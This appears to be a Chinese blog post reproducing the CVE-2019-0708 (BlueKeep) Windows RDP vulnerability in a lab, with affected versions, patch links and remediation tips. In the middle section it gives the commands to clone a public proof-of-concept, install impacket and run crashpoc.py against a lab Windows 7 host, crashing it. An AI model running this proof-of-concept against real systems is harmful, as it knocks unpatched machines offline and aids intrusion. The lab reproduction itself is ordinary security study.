windows RDP远程代码执行_CVE-2019-0708漏洞复现

windows RDP远程代码执行_CVE-2019-0708漏洞复现

一、漏洞描述

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者使用RDP(常见端口3389)连接到目标系统并发送特制请求时,可以在目标系统上执行任意命令。甚至传播恶意蠕虫,感染内网其他机器。类似于2017年爆发的WannaCry等恶意勒索软件病毒。

漏洞评级

CVE-2019-0708 严重

影响版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

安全建议

注:
以下补丁修复方案均存在不可预知风险(黑屏或死机),建议修复前先备份数据/镜像
针对Windows 7、Windows Server 2008和Windows Server 2008 R2的用户,及时安装官方安全补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
针对Windows 2003及Windows XP的用户,及时更新系统版本或安装官方补丁:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
针对云用户,可使用安全组临时禁止RDP服务端口 3389 对外,阻止漏洞攻击
相关链接
微软官方通知:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
三、漏洞环境搭建

目标机:windows 7 IP:192.168.245.133

攻击机:kali 2021.1 (安装python3环境,安装impacket模块)

条件:目标机开启3389端口,关闭防火墙

在这里插入图片描述
攻击机:kali 2021.1 (安装python3环境,安装impacket模块)
条件:目标机开启3389端口,关闭防火墙
四、漏洞复现:
1、找到靶机并查看他3389端口有没有开启
在这里插入图片描述
在这里插入图片描述
2、然后升级msf版本
apt-get update
apt-get install metasploit-framework
注意:不升级msf,使用msf v4版本加载第三方脚本,会报错,可能只因为cve-2019-0708的脚本只兼容最新的msf版本
在这里插入图片描述
启动msf,可以看到msf当前的版本
在这里插入图片描述
3、搜索cve-2019-0708脚本
在这里插入图片描述
4、使用脚本,设置参数
在这里插入图片描述
5、开始攻击,下图说明目标存在漏洞:
在这里插入图片描述
6、git clone代码
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
7、安装需要的库后执行POC
pip3 install impacket
python3 crashpoc.py 192.168.245.133 64 #python3 crashpoc.py ip地址 系统类型
在这里插入图片描述
POC被成功被执行,虽然现阶段只是让目标蓝屏,但是我相信对这个漏洞的利用手段绝对不会止步于此。

最后修复方案也补充一下吧:
1、最简便的方法就是安装一个安全管家,比如火绒、360之类的
2、把系统的自动更新打开或者到微软官网下载补丁
3、把自己电脑上的远程桌面关掉

如果对你有帮助三连啊!!!

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2019-0708,也被称为“蓝望之门”(BlueKeep)漏洞,是一种存在于微软Windows操作系统中的远程桌面服务(RDP)漏洞。该漏洞的严重性被评为“高危”,因为攻击者可以利用它远程执行代码,而无需用户的交互。 CVE-2019-0708漏洞允许攻击者通过发送特制的网络数据包来利用RDP服务的漏洞。一旦成功利用漏洞,攻击者便可以在目标系统上执行任意代码,以获取系统权限,窃取敏感信息,传播恶意软件等。 这个漏洞影响大量的Windows操作系统版本,包括Windows 7、Windows Server 2008和Windows Server 2008 R2。微软非常重视该漏洞的危害,迅速发布了安全更新来修复这个漏洞。由于漏洞的严重性和潜在的传播范围,微软敦促用户尽快安装相关的安全补丁以保护系统安全。 CVE-2019-0708的公开引起了极大关注,因为它与WannaCry和NotPetya等蠕虫攻击类似。攻击者可以通过互联网寻找易受攻击的系统,然后远程利用此漏洞进行恶意活动。由于大量的系统受到威胁,网络上不少在线操作系统扫描工具也被开发出来,用于检测系统是否存在漏洞。 为了保护自己免受CVE-2019-0708漏洞的攻击,用户应尽快安装相关的安全补丁或升级其操作系统。此外,还要采取其他预防措施,例如禁用RDP服务、使用防火墙来阻止恶意流量,并定期备份和更新系统文件。与此同时,网络管理员也应加强网络安全管理,定期检查和修复系统漏洞以确保网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值